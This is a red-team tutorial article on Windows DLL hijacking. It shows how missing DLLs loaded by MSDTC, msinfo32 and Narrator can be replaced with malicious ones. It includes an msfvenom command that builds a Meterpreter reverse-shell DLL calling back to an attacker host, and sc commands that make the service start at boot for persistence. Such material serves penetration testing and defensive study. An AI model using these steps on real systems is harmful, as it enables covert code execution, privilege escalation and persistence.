When a program is starting a number of DLL’s are loaded into the memory space of it’s process. Windows is searching the DLL’s that are required by the process by looking into the system folders in a specific order. Hijacking the search order can be used in red teaming scenarios to identify privilege escalation and persistence opportunities.

Furthermore reports showing common malware trying to masquerade as a DLL that is missing from a Windows process in order to execute arbitrary code and remain hidden. The attack surface regarding DLL hijacking is huge and depends on the version of the operating system and the software installed. However some of the most notable that can be used in Windows 7 and Windows 10 are described in this article.

MSDTC

The Distributed Transaction Coordinator is a windows service responsible for coordinating transactions between databases (SQL Server) and web servers. When this service starts attempts to load the following three DLL files from System32.

1. oci.dll
2. SQLLib80.dll
3. xa80.dll

These are defined in the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI

In default Windows installations the “oci.dll” is missing from System32 folder. This gives the opportunity to plant an arbitrary DLL into this folder that will have the same name (Administrator privileges are required) in order to execute malicious code. Metasploit utility “msfvenom” can generate DLL files that will contain a payload.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.13 LPORT=8888 -f dll > pentestlab.dll

The Distributed Transaction Coordinator service can be started from Windows service or by executing the following command from an elevated shell:

net start msdtc

When the process starts the arbitrary DLL will executed and a Meterpreter session will open with the privileges of a network service.

Reviewing the “msdtc.exe” process in Process Explorer will verify that the DLL was loaded into the process.

Permissions can be modified to Administrator if the following is executed from an elevated command prompt.

msdtc -install

Executing “getuid” from a Meterpreter session will verify that the process it is now running under “pentestlab” which is a local administrator.

The “msdtc” service is not configured to start at boot by default as the Start Up type is set to “Manual”. Configuring the service to start automatically at boot will load the arbitrary DLL and will create persistence on the system.

sc qc msdtc
sc config msdtc start= auto

MSINFO

Adam wrote in his blog in 2013 about phantom DLL hijacking which is a technique that relies on loading arbitrary DLL’s from Windows process that are missing specific DLL’s. Microsoft system information tool is responsible to gather information about the hardware, software and system components. In modern Windows versions like 8.1 and 10 this process is trying to load a missing DLL from System32 called “fveapi.dll“. Planting a malicious DLL in that directory with the same name it will have as a result the DLL to be loaded into the “msinfo32.exe” process.

A Meterpreter session with PID 4496 the child process of “msinfo32.exe“.

Narrator

Microsoft Narrator is a screen reading application for Windows environments. Adam identified that a DLL related to localisation settings is missing (MSTTSLocEnUS.DLL) and could be abused as well for execution of arbitrary code. The DLL is missing from the following location:

C:\Windows\System32\Speech\Engines\TTS\MSTTSLocEnUS.DLL

When the “Narrator.exe” process starts the DLL will be loaded into that process as it can be seen from Process Explorer.

References

• https://attack.mitre.org/techniques/T1038/
• https://blog.trendmicro.com/trendlabs-security-intelligence/shadow-force-uses-dll-hijacking-targets-south-korean-company/
• https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/
• http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5
• https://github.com/sensepost/rattler